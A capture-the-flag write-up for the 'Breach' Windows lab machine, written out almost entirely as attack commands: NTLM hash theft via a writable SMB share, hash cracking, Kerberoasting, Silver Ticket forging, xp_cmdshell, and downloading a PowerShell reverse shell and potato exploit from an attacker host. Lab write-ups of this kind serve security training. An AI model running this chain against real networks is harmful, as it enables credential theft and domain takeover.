Machine (Medium) - Breach
Writeup for the Breach machine, which involves exploiting writable SMB shares and weak NTLMv2 authentication to achieve privilege escalation.
Writeup Author: BobBuilder
Objective: Gain access to the breach.vl
machine by exploiting SMB shares and NTLMv2 vulnerabilities, leading to credential theft and privilege escalation using a Silver Ticket attack.
Category | Difficulty | Platform | Machine Author |
---|---|---|---|
Machine | Medium | Windows | xct |
Enumeration
SMB Shares (Unauthenticated)
nxc smb <breach_ip> -u 'guest' -p '' --shares
Uploading Files to Writable Share
for file in ~/tools/ntlm_theft/nt/*; do
filename=$(basename "$file")
nxc smb <breach_ip> -u 'guest' -p '' --share share --put-file "$file" "\\transfer\\$filename"
done
Alternative using smbclient
:
for file in $(ls ~/tools/ntlm_theft/nt/); do
smbclient -c "cd transfer; put $file" \\\\<breach_ip>\\share -N
done
Initial Access
Capture NTLMv2 Hash (Responder)
sudo responder -I tun0
- Captured:
Julia.Wong::BREACH:...
Crack Hash
hashcat.exe -m 13100 hashes.txt uniq.lst
- Recovered credentials:
julia.wong:<REDACTED>
Post-Exploitation
Kerberoasting
impacket-GetUserSPNs -target-domain breach.vl -usersfile users.txt -dc-ip <dc_ip> breach.vl/guest -no-pass
- Extracted SPN hash for
svc_mssql
.
Crack SPN Hash
hashcat.exe -m 13100 hashes.txt uniq.lst
- Found credentials:
svc_mssql:<REDACTED>
MSSQL Access
impacket-mssqlclient breach/svc_mssql:<REDACTED>@breach.vl -windows-auth
Enable Directory Listing via xp_dirtree
EXEC xp_dirtree 'C:\';
BloodHound Enumeration
bloodhound-python -c all -u "svc_mssql" -p "<REDACTED>" -d breach.vl -ns <dc_ip>
Privilege Escalation - Silver Ticket
Dump PAC Info (Identify Domain SID)
impacket-getPac -targetUser administrator breach.vl/julia.wong:<REDACTED>
Derive NTLM Hash from Password
iconv -f ASCII -t UTF-16LE <(printf "Trustno1") | openssl dgst -md4 -provider legacy -md4
- Output:
<svc_mssql_ntlm_hash>
Extract SPN from BloodHound
MSSQLSvc/breachdc.breach.vl
Craft Silver Ticket
impacket-ticketer -nthash <svc_mssql_ntlm_hash> -domain-sid <domain_sid> -domain breach.vl -spn MSSQLSvc/breachdc.breach.vl Administrator
export KRB5CCNAME=./Administrator.ccache
Authenticate via Silver Ticket
impacket-mssqlclient breachdc.breach.vl -k -no-pass
Enable command execution:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';
Execute Reverse Shell (PowerShell)
xp_cmdshell powershell -c "curl http://<attacker_ip>/tiny_revtcp.ps1 -o C:\Users\Public\Downloads\tcp.ps1"
xp_cmdshell powershell -ExecutionPolicy Bypass -c "cd C:\Users\Public\Downloads;.\tcp.ps1"
Privilege Escalation - SeImpersonatePrivilege
Confirm Token Privileges
whoami /all
- Confirmed
SeImpersonatePrivilege
is enabled.
Exploit via Juicy Potato-like Tool
curl http://<attacker_ip>/god4.exe -O god.exe
.\god.exe -cmd "cmd /c more C:\Users\Administrator\Desktop\root.txt"